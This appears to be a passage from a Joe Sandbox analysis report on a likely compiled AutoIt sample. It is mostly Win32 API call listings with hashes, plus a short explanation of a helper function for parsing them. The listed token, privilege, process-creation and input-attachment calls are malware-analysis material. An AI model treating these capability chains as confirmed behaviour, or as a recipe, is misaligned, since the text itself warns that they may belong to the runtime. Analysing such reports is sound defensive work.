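• Process32NextW.KERNEL32(00000000,?), ref: 00DDD52F
Memory Dump Source
APIs
• GetForegroundWindow.USER32 ref: 00E016EB
  • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
  • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
  • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
• GetCaretPos.USER32(?), ref: 00E016FF
APIs
  • Part of subcall function 00DD1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD102A
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DD15BE
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DD14FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00DD1506
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DD154F
"""
```

Paste a report section into `analyze(text)` to get, per block, the first own call site (useful for jumping to the function in the dump), the ordered API list, any argument the sandbox resolved to a symbol such as TokenIntegrityLevel, and the matched chain labels. One caveat when reading the matches: the report classes the sample as a likely compiled AutoIt script, so a chain present in the static listing may belong to the AutoIt runtime's built-in functions rather than to code the embedded script actually invokes. Treat a match as capability present in the binary and confirm it against the report's behaviour sections before writing it up as observed behaviour.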
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00DD1A47
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A59
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A6F
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                              • Instruction ID: 602236a5ea570f32eb0683436bc4387e6785d76c0250bb469a958ed1e534f6a0
                                              • Opcode Fuzzy Hash: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                              • Instruction Fuzzy Hash: B2110C3AD01219FFEB11DBA5CD85FADBB78EB04750F200092E604B7290D6716E51DB94
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00DDE1FD
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00DDE230
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DDE246
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DDE24D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2880819207-0
                                              • Opcode ID: 0a423dab36ee21583a315c8b710b3308348a605c4d2be826caeb587e587016fc
                                              • Instruction ID: e45d5d896533d9a74413062958155f4fd38996958ab3a31cbae119267c043edd
                                              • Opcode Fuzzy Hash: 0a423dab36ee21583a315c8b710b3308348a605c4d2be826caeb587e587016fc
                                              • Instruction Fuzzy Hash: 7A110876904214BFCB01AFA99C05A9F7FAC9B45310F14435AF914F7391D271D94887B0
                                              APIs
                                              • CreateThread.KERNEL32(00000000,?,00D9CFF9,00000000,00000004,00000000), ref: 00D9D218
                                              • GetLastError.KERNEL32 ref: 00D9D224
                                              • __dosmaperr.LIBCMT ref: 00D9D22B
                                              • ResumeThread.KERNEL32(00000000), ref: 00D9D249
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                              • String ID:
                                              • API String ID: 173952441-0
                                              • Opcode ID: ba9be968f4552223c4b597321bd7a14fdb2f8de39749f3cc6327c71b2e57b811
                                              • Instruction ID: 4d373d2a84ae845f39bb624bdf378a9cdcc27a7eebf25dfdbd0ae686d5883392
                                              • Opcode Fuzzy Hash: ba9be968f4552223c4b597321bd7a14fdb2f8de39749f3cc6327c71b2e57b811
                                              • Instruction Fuzzy Hash: 7401F536805204BFCF115BA6DC09BAE7A6ADF82730F240319F925E61D0CB71C945C6B0
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                              • GetStockObject.GDI32(00000011), ref: 00D76060
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateMessageObjectSendStockWindow
                                              • String ID:
                                              • API String ID: 3970641297-0
                                              • Opcode ID: 9e25b7a4b76eba6e7aa71490b5d8db242a503e17206fbe8752c7574db2175da2
                                              • Instruction ID: 12c7bfdaf1260b0e340bf2caf4732f5da30a04d99a81406faeb56a8fcc793141
                                              • Opcode Fuzzy Hash: 9e25b7a4b76eba6e7aa71490b5d8db242a503e17206fbe8752c7574db2175da2
                                              • Instruction Fuzzy Hash: AC11A172501908BFEF124FA4DC44EEA7B69FF18364F144206FA0852010E732DCA0DFA0
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00D93B56
                                                • Part of subcall function 00D93AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D93AD2
                                                • Part of subcall function 00D93AA3: ___AdjustPointer.LIBCMT ref: 00D93AED
                                              • _UnwindNestedFrames.LIBCMT ref: 00D93B6B
                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D93B7C
                                              • CallCatchBlock.LIBVCRUNTIME ref: 00D93BA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                              • String ID:
                                              • API String ID: 737400349-0
                                              • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                              • Instruction ID: e4232d7f99a2579dc8acb75cf546af5f4a7fe8eaf61191aaeac778c928903f68
                                              • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                              • Instruction Fuzzy Hash: 7A01E932100149BBDF126E95CC46EEB7B6AEF58758F044014FE4896121C732E962EBB0
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D713C6,00000000,00000000,?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue), ref: 00DA30A5
                                              • GetLastError.KERNEL32(?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue,00E12290,FlsSetValue,00000000,00000364,?,00DA2E46), ref: 00DA30B1
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue,00E12290,FlsSetValue,00000000), ref: 00DA30BF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: e75becd8141df120a7c5ecfa94290e24851f52df56b0a16064d6e31f5a63fa83
                                              • Instruction ID: b546487f0ca5d528bce5f40b4cb8ab4f8f749741eea6fa93e3d2bfc9cedd7ca3
                                              • Opcode Fuzzy Hash: e75becd8141df120a7c5ecfa94290e24851f52df56b0a16064d6e31f5a63fa83
                                              • Instruction Fuzzy Hash: 8501F732301622AFCB314F7A9C44A577B99AF07BA1B340720F945F3190C722D945C6F4
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00DD747F
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DD7497
                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DD74AC
                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00DD74CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: e6702ac207e2d2422681ec5051ac1de67c69a8770464e3364c95ceca61bf9b1a
                                              • Instruction ID: 5de5a471b69d9bc3f77ca55e743af0ba3df93e86f92e7912c9ff1b825a6fbcbf
                                              • Opcode Fuzzy Hash: e6702ac207e2d2422681ec5051ac1de67c69a8770464e3364c95ceca61bf9b1a
                                              • Instruction Fuzzy Hash: B011C4B12053109FE7218F54DC08F92BFFCFB00B00F1085AAA666D6291E771E948DB60
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0C4
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0E9
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0F3
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB126
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: 9c157ab1dc004d607866828436e83060da48728a1854d95f4f4bff7cab98e86c
                                              • Instruction ID: 6e1e94b403b83c6701dfc7473b09a0e563e19eeefc28e1f463625cd3aa2baf27
                                              • Opcode Fuzzy Hash: 9c157ab1dc004d607866828436e83060da48728a1854d95f4f4bff7cab98e86c
                                              • Instruction Fuzzy Hash: F1115E31C0162CDBCF00AFE5D959AFEBB78FF0A725F124187D941B2241CB3095948BA1
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2DC5
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2DD6
                                              • GetCurrentThreadId.KERNEL32 ref: 00DD2DDD
                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2DE4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: 7da2a86503ee24e375bc1590faa369439a3f3bc5b14448a4cb7161aa4d6c3283
                                              • Instruction ID: df641b4abfb2a4fcf8a264fb5b2bdd05c0c3a33261d8b473578d261443a562c4
                                              • Opcode Fuzzy Hash: 7da2a86503ee24e375bc1590faa369439a3f3bc5b14448a4cb7161aa4d6c3283
                                              • Instruction Fuzzy Hash: F6E06DB11012247AD7201BA3AC0DEFB3E6DEB56FA1F140216B106E11809AA6C888C6F0
                                              APIs
                                                • Part of subcall function 00D89639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896A2
                                                • Part of subcall function 00D89639: BeginPath.GDI32(?), ref: 00D896B9
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E08887
                                              • LineTo.GDI32(?,?,?), ref: 00E08894
                                              • EndPath.GDI32(?), ref: 00E088A4
                                              • StrokePath.GDI32(?), ref: 00E088B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: c1ad203d9ab6e74db58fb9bca32bf96ebd60b81746b8bff510ff6c9b6fa5c114
                                              • Instruction ID: f05eb49000e37c711071195388f2e1cba40fdc7cab4500cfb20df8ad8efa311d
                                              • Opcode Fuzzy Hash: c1ad203d9ab6e74db58fb9bca32bf96ebd60b81746b8bff510ff6c9b6fa5c114
                                              • Instruction Fuzzy Hash: 34F09A36002218FAEB122F95AC0AFCA3E29AF46310F548100FB01710E1C7760595CBE5
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00D898CC
                                              • SetTextColor.GDI32(?,?), ref: 00D898D6
                                              • SetBkMode.GDI32(?,00000001), ref: 00D898E9
                                              • GetStockObject.GDI32(00000005), ref: 00D898F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Color$ModeObjectStockText
                                              • String ID:
                                              • API String ID: 4037423528-0
                                              • Opcode ID: ac4ef964bd43fd7385fdb2ae9769a7df12d344128b9ca171557c968580cac554
                                              • Instruction ID: 2932c57328d53e4515e7ea746ea758c810646db1aabdd845e861f117f9d40e75
                                              • Opcode Fuzzy Hash: ac4ef964bd43fd7385fdb2ae9769a7df12d344128b9ca171557c968580cac554
                                              • Instruction Fuzzy Hash: 05E06531244240AEDB215B75AC09BE83F21AB11335F188319F6F9640E1C37246959F20
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00DD1634
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DD11D9), ref: 00DD163B
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DD11D9), ref: 00DD1648
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DD11D9), ref: 00DD164F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: 0874fcbc611e09a4b9bc67a7abe139642fd07a4c60dbe99e21a01aaf9758d159
                                              • Instruction ID: 34f622024ab3928529e63fe2a7af2bf182452cf0018751b8f2459e85f7029684
                                              • Opcode Fuzzy Hash: 0874fcbc611e09a4b9bc67a7abe139642fd07a4c60dbe99e21a01aaf9758d159
                                              • Instruction Fuzzy Hash: 95E08635601211EFE7201FA29D0DB463B7CEF44791F288909F245E9090E6358489C760
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00DCD858
                                              • GetDC.USER32(00000000), ref: 00DCD862
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DCD882
                                              • ReleaseDC.USER32(?), ref: 00DCD8A3
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: f3e447c377757ca711cc8dbe39eedadd49024e85f106f88f0e3e018e658ac9d4
                                              • Instruction ID: f8e990003cad0834e98f7a2cc863792671798f403e4fe8d8c288d20fa9cbd638
                                              • Opcode Fuzzy Hash: f3e447c377757ca711cc8dbe39eedadd49024e85f106f88f0e3e018e658ac9d4
                                              • Instruction Fuzzy Hash: 47E01270800205DFCF519FA1D80866DBBB2FF08710F208119F846F7250C7368545EF60
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00DCD86C
                                              • GetDC.USER32(00000000), ref: 00DCD876
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DCD882
                                              • ReleaseDC.USER32(?), ref: 00DCD8A3
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: d004501727bb75181c4bdeff367a8a95fd2a03c550adaa541a64547dbbe3b15d
                                              • Instruction ID: 6eb6c7c8837f91a952c6b73c9d0ce7e617f0811a6194dde84c3d2dec174a6622
                                              • Opcode Fuzzy Hash: d004501727bb75181c4bdeff367a8a95fd2a03c550adaa541a64547dbbe3b15d
                                              • Instruction Fuzzy Hash: 48E01A70800200DFCF50AFA1E80866DBBB1FB08710F208108E84AF7290CB3A59469F50
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DE4ED4
                                              Strings
                                              Similarity
                                              • API ID: Connection_wcslen
                                              • String ID: *$LPT
                                              • API String ID: 1725874428-3443410124
                                              • Opcode ID: eb3542905fc44720aac655359315b037648b521d4d111c858f1b6ec755e53a4d
                                              • Instruction ID: ea424cca5810fd9adf1b69d67f3436e8e4a9160bc63b6f7d34f8ca197da5e252
                                              • Opcode Fuzzy Hash: eb3542905fc44720aac655359315b037648b521d4d111c858f1b6ec755e53a4d
                                              • Instruction Fuzzy Hash: 7B916D75A002449FCB14EF59C484EAABBF1FF44704F198099E84A9F3A2D731ED85CBA1
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00D9E30D
                                              Strings
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: 335c75e23be3a4c2701bab8419074dc76dbd929b7a4446beb8d6906e17c5fc58
                                              • Instruction ID: ac28e551a3eb106a51ca29351399296834f23aefdafbd5b71bf16aeee5ccf028
                                              • Opcode Fuzzy Hash: 335c75e23be3a4c2701bab8419074dc76dbd929b7a4446beb8d6906e17c5fc58
                                              • Instruction Fuzzy Hash: 48516E71A0D202DACF15BB14CD013B97BA4EB41741F388DA8F0D5922E9EB35CCD59A76
                                              APIs
                                              • CharUpperBuffW.USER32(00DC569E,00000000,?,00E0CC08,?,00000000,00000000), ref: 00DF78DD
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • CharUpperBuffW.USER32(00DC569E,00000000,?,00E0CC08,00000000,?,00000000,00000000), ref: 00DF783B
                                              Strings
                                              Similarity
                                              • API ID: BuffCharUpper$_wcslen
                                              • String ID: <s
                                              • API String ID: 3544283678-2940880691
                                              • Opcode ID: bddc67e844f609abe94ce456c318421b7a35c045d521ba0505dfa8d92b353f3a
                                              • Instruction ID: 55d801e029df76a21b429b9df2e854f207302252fb5419c5b918fb1c2a373424
                                              • Opcode Fuzzy Hash: bddc67e844f609abe94ce456c318421b7a35c045d521ba0505dfa8d92b353f3a
                                              • Instruction Fuzzy Hash: 89614B72914119AACF14EBA4CC91DFDB378FF14700B59812AF646B7091FF60AA49DBB0
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              • Opcode ID: 0f91d272c6d019cc44b5db1a66fff86b241eba154ad33d8299e3d0e073e1c7f5
                                              • Instruction ID: 6bbd799d9cb89d05985b191b429d77dc39d1def1f6c7d88de4b5c991856c192b
                                              • Opcode Fuzzy Hash: 0f91d272c6d019cc44b5db1a66fff86b241eba154ad33d8299e3d0e073e1c7f5
